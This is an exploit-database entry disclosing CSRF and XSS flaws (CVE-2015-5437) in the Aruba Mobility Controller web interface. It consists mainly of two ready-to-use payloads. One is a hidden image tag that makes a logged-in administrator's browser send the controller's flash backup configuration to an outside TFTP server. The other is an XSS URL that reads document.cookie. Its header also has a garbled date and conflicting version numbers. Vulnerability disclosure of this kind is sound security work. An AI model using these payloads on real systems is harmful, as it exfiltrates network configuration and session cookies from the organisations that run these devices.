Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities

Author: Itzik Chen
type: webapps
platform: xml
port: 4343.0
date_added: 2015-08-20 
date_updated: 2015-08-20 
verified: 0 
codes: CVE-2015-5437;OSVDB-126601;OSVDB-126600 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
# Date: 08/016/2015
# Author: Itzik Chen
# Product web page: http://www.arubanetworks.com
# Affected Version: 6.4.2.8
# Tested on: Aruba7240, Ver 6.2.4.8



Summary
================

Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
Arube Controller suffers from CSRF and XSS vulnerabilities.



Proof of Concept - CSRF
=========================

192.168.0.1 - Controller IP-Address
172.17.0.1 - Remote TFTP server

<IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">

That will send the flashbackup configuration file to a remote TFTP server.



Proof of Concept - XSS
=========================

https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>